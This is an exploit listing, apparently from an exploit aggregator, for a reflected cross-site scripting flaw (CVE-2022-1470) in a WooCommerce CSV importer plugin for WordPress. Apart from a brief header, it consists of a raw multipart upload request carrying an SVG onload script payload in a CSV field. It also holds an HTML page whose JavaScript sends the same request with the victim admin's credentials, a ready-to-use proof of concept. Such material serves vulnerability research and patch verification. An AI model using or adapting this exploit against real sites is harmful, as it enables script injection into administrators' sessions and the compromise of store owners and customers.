Exploit for Ultimate WooCommerce CSV Importer <= 2.0 - Reflected Cross-Site Scripting CVE-2022-1470

Name: Exploit for Ultimate WooCommerce CSV Importer <= 2.0 - Reflected Cross-Site Scripting CVE-2022-1470
Rating: 5 (77 reviews)
2022-06-02 | CVSS 4.3
## https://sploitus.com/exploit?id=WPEX-ID:13BB796F-7A17-47C9-A46F-A1D6CA4B6B91
POST /wp-admin/admin.php?page=simple-woocommerce-csv-loader%2Fadmin%2FCSVLoader.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookies: [logged in admin]
Connection: close

------WebKitFormBoundaryYaKY5tnSQ8biGkYB
Content-Disposition: form-data; name="post_type"

product
------WebKitFormBoundaryYaKY5tnSQ8biGkYB
Content-Disposition: form-data; name="separator"

,
------WebKitFormBoundaryYaKY5tnSQ8biGkYB
Content-Disposition: form-data; name="titeled"

on
------WebKitFormBoundaryYaKY5tnSQ8biGkYB
Content-Disposition: form-data; name="hierarchical_multicat"

on
------WebKitFormBoundaryYaKY5tnSQ8biGkYB
Content-Disposition: form-data; name="upload_file"; filename="example_code.csv"
Content-Type: text/csv

Name,Content,Price,Gender,sku,Multi_cat,Thumbnail
Strawberry Short Cake,Delicious Strawberry Cake 18"",80,Bakery,001,Dessert,<svg/onload=alert(/XSS/)>


<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "https:\/\/example.com\/wp-admin\/admin.php?page=simple-woocommerce-csv-loader%2Fadmin%2FCSVLoader.php", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------292171499811633611081131645549");
        xhr.withCredentials = true;
        var body = "-----------------------------292171499811633611081131645549\r\n" +
          "Content-Disposition: form-data; name=\"post_type\"\r\n" +
          "\r\n" +
          "product\r\n" +
          "-----------------------------292171499811633611081131645549\r\n" +
          "Content-Disposition: form-data; name=\"taxonomy\"\r\n" +
          "\r\n" +
          "product_type\r\n" +
          "-----------------------------292171499811633611081131645549\r\n" +
          "Content-Disposition: form-data; name=\"separator\"\r\n" +
          "\r\n" +
          ",\r\n" +
          "-----------------------------292171499811633611081131645549\r\n" +
          "Content-Disposition: form-data; name=\"titeled\"\r\n" +
          "\r\n" +
          "on\r\n" +
          "-----------------------------292171499811633611081131645549\r\n" +
          "Content-Disposition: form-data; name=\"hierarchical_multicat\"\r\n" +
          "\r\n" +
          "on\r\n" +
          "-----------------------------292171499811633611081131645549\r\n" +
          "Content-Disposition: form-data; name=\"upload_file\"; filename=\"a.csv\"\r\n" +
          "Content-Type: text/csv\r\n" +
          "\r\n" +
          "Name,Content,Price,Gender,sku,Multi_cat,Thumbnail\n" +
          "Strawberry Short Cake,Delicious Strawberry Cake 18\"\",80,Bakery,001,Dessert,\x3csvg/onload=alert(/XSS/)\x3e\n" +
          "\r\n" +
          "-----------------------------292171499811633611081131645549\r\n" +
          "Content-Disposition: form-data; name=\"wc_load_csv\"\r\n" +
          "\r\n" +
          "Load\r\n" +
          "-----------------------------292171499811633611081131645549--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>